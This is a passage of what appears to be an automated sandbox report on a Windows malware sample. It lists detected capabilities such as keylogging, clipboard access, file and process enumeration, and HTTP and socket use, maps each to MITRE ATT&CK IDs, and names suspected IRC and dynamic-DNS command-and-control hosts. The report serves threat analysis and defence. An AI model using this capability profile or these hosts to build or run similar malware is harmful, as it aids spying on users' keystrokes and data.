Found reference to API \"OpenEventLogA\" (Indicator: \"OpenEventLog\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-534", "type": 2, "name": "Contains ability to read files (API string)", "description": "Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-84", "type": 2, "relevance": 1, "name": "Contains ability to find logical drives of the machine (API string)", "description": "Found reference to API \"GetLogicalDriveStringsA\" (Indicator: \"GetLogicalDriveStrings\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetLogicalDriveStringsA\" (Indicator: \"GetLogicalDriveStrings\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-121", "type": 2, "relevance": 1, "name": "Contains ability to retrieve usernames and/or user information (API string)", "description": "Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetUserNameA\" (Indicator: \"GetUserName\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"GetUserNameA\" (Indicator: \"GetUserName\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-164", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the fully qualified path of module (API string)", "description": "Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetEnvironmentStringsW\" (Indicator: \"GetEnvironmentStrings\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetEnvironmentStrings\" (Indicator: \"GetEnvironmentStrings\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"GetEnvironmentStringsW\" (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"GetEnvironmentStrings\" (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-83", "type": 2, "relevance": 1, "name": "Contains ability to enumerate files on disk (API string)", "description": "Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"FindNextFileA\" (Indicator: \"FindNextFile\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"FindNextFileA\" (Indicator: \"FindNextFile\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"11775787367,5136,3117,,FindNextFileW,kernel32.dll,\"252:21:59.542\",RX=0,PX=0\" (Indicator: \"FindNextFile\"; Source: \"00000000-00005068.00000000.140099.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindFirstFileW\" with parameter C:\\*.* (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter dllconf.exe (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00005056)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-122", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the NetBIOS name of the local computer (API string)", "description": "Found reference to API \"GetComputerNameA\" (Indicator: \"GetComputerName\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetComputerNameA\" (Indicator: \"GetComputerName\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"dllconf.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-107", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the host's architecture (API string)", "description": "Found reference to API \"GetEnvironmentVariableA\" (Indicator: \"GetEnvironmentVariable\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetEnvironmentVariableA\" (Indicator: \"GetEnvironmentVariable\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-188", "type": 2, "relevance": 1, "name": "Contains ability to access clipboard data (API string)", "description": "Found reference to API \"GetClipboardData\" (Indicator: \"GetClipboardData\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"OpenClipboard\" (Indicator: \"OpenClipboard\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetClipboardData\" (Indicator: \"GetClipboardData\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"OpenClipboard\" (Indicator: \"OpenClipboard\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-205", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the time elapsed since the system was started (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-224", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the local name for a socket (API string)", "description": "Found reference to API \"getsockname\" (Indicator: \"getsockname\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")", "origin": "File/Memory", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-88", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about pressed keystrokes (API string)", "description": "Found reference to API \"GetAsyncKeyState\" (Indicator: \"GetAsyncKeyState\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"GetAsyncKeyState\" (Indicator: \"GetAsyncKeyState\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-86", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about operating system (API string)", "description": "Found reference to API \"670419874,1712,3024,,RtlGetVersion,NTDLL.dll,\"252:22:00.915\",RX=0,PX=0\" (Indicator: \"RtlGetVersion\"; Source: \"00000000-00005392.00000000.140409.00640000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-532", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the host name of a computer (API string)", "description": "Found reference to API \"gethostname\" (Indicator: \"gethostname\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-517", "type": 2, "relevance": 1, "name": "Contains ability to enumerate running processes using Tasklist", "description": "Observed string: \"tasklist.exe\" [Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33]\n Observed string: \"tasklist.exe\" [Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp]", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-556", "type": 2, "relevance": 1, "name": "Found strings related to keylogger", "description": "Found string \"[BACK]\" (Indicator: \"[Back]\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"[TAB]\" (Indicator: \"[tab]\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"[BACK]\" (Indicator: \"[Back]\"; Source: \"00000000-00005056.00000000.139963.00423000.00000040.mdmp\")\n Found string \"[TAB]\" (Indicator: \"[tab]\"; Source: \"00000000-00005056.00000000.139963.00423000.00000040.mdmp\")\n Found string \"[BACK]\" (Indicator: \"[Back]\"; Source: \"00000000-00005068.00000000.140099.00423000.00000040.mdmp, 00000000-00005068.00000001.140461.00423000.00000040.mdmp\")\n Found string \"[TAB]\" (Indicator: \"[tab]\"; Source: \"00000000-00005068.00000000.140099.00423000.00000040.mdmp, 00000000-00005068.00000001.140461.00423000.00000040.mdmp\")\n Found string \"[BACK]\" (Indicator: \"[Back]\"; Source: \"00000000-00005392.00000000.140409.00423000.00000040.mdmp\")\n Found string \"[TAB]\" (Indicator: \"[tab]\"; Source: \"00000000-00005392.00000000.140409.00423000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dllconf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"dllconf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-88", "relevance": 1, "name": "Imports GetCommandLine API", "description": "Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33]\n Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: dllconf.exe]", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-210", "type": 2, "relevance": 1, "name": "Contains ability to create/connect to a named pipe (API string)", "description": "Found reference to API \"CreatePipe\" (Indicator: \"CreatePipe\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"PeekNamedPipe\" (Indicator: \"PeekNamedPipe\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"CreatePipe\" (Indicator: \"CreatePipe\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"PeekNamedPipe\" (Indicator: \"PeekNamedPipe\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-537", "type": 2, "relevance": 1, "name": "Contains ability to create a new HTTP request (API string)", "description": "Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-228", "type": 2, "relevance": 1, "name": "Contains ability to communicate with C2 using Sockets (API string)", "description": "Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")", "origin": "File/Memory", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Heuristic match: \"irc.quakenet.org\"\n Heuristic match: \"us.quakenet.org\"\n Heuristic match: \"hwinfoq.com\"\n Heuristic match: \"dogz.mooo.com\"\n Heuristic match: \"evil.mooo.com\"\n Heuristic match: \"fli4l.mooo.com\"\n Heuristic match: \"tippspiel.mooo.com\"\n Heuristic match: \"bullock.mooo.com\"\n Heuristic match: \"666.afraid.org\"\n Heuristic match: \"nightwish.afraid.org\"\n Heuristic match: \"foenix.afraid.org\"\n Heuristic match: \"i.am.not.afraid.org\"\n Heuristic match: \"be.very.afraid.org\"\n Heuristic match: \"nin.afraid.org\"\n Heuristic match: \"codebytesdev.afraid.org\"\n Heuristic match: \"rizahnst.afraid.org\"\n Heuristic match: \"lwser.mooo.com\"\n Heuristic match: \"franck78.afraid.org\"\n Heuristic match: \"eventhorizon.no-ip.org\"\n Heuristic match: \"gacw.no-ip.org\"\n Heuristic match: \"kylodee.afraid.org\"\n Heuristic match: \"janning.no-ip.org\"\n Heuristic match: \":irc.afraid.org\"\n Heuristic match: \"co.uk\"\n Heuristic match: \"windowsupdate.com\"\n Pattern match: \"www.windowsupdate.com\"\n Heuristic match: \"v5windowsupdate.microsoft.nsatc.net\"\n Pattern match: \"www3.ca.com\"\n Pattern match: \"www.ravantivirus.com\"\n Pattern match: \"www.bitdefender.com\"\n Pattern match: \"www.pandasoftware.com\"\n Heuristic match: \"housecall.trendmicro.com\"\n Pattern match: \"www.trendmicro.com\"\n Heuristic match: \"trendmicro.com\"\n Pattern match: \"www.nai.com\"\n Heuristic match: \"nai.com\"\n Heuristic match: \"secure.nai.com\"\n Pattern match: \"www.my-etrust.com\"\n Heuristic match: \"my-etrust.com\"\n Heuristic match: \"ca.com\"\n Pattern match: \"www.ca.com\"\n Heuristic match: \"networkassociates.com\"\n Pattern match: \"www.networkassociates.com\"\n Heuristic match: \"avp.com\"\n Pattern match: \"www.kaspersky.com\"\n Pattern match: \"www.avp.com\"\n Heuristic match: \"kaspersky.com\"\n Pattern match: \"www.f-secure.com\"\n Heuristic match: \"f-secure.com\"\n Heuristic match: \"viruslist.com\"\n Pattern match: \"www.viruslist.com\"\n Heuristic match: \"sophos.com\"\n Pattern match: \"www.sophos.com\"\n Heuristic match: \"us.mcafee.com\"\n Heuristic match: \"mcafee.com\"\n Pattern match: \"www.mcafee.com\"\n Heuristic match: \"symantec.com\"\n Heuristic match: \"securityresponse.symantec.com\"\n Pattern match: \"www.symantec.com\"\n Heuristic match: \".co.uk\"\n Heuristic match: \"yahoo.com\"\n Heuristic match: \"aol.com\"\n Heuristic match: \"mail.com\"\n Heuristic match: \"hotmail.com\"\n Heuristic match: \"t.com\"\n Heuristic match: \".vbs;.vbe;.js;.jse;.wsf;.ws\"\n Heuristic match: \"585.ba\"\n Heuristic match: \"cero.rs\"\n Heuristic match: \"bdaplgin.ax\"\n Heuristic match: \"athext=.com;.exe;.bat;.cmd;.vbs;.vbe;.js;.jse;.wsf;.ws\"\n Heuristic match: \"chcp.com\"\n Heuristic match: \"csrr.rs\"\n Heuristic match: \"djctq.rs\"\n Heuristic match: \"se;.wsf;.ws\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-539", "type": 2, "relevance": 1, "name": "Contains reference to Windows internet services (API string)", "description": "Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", 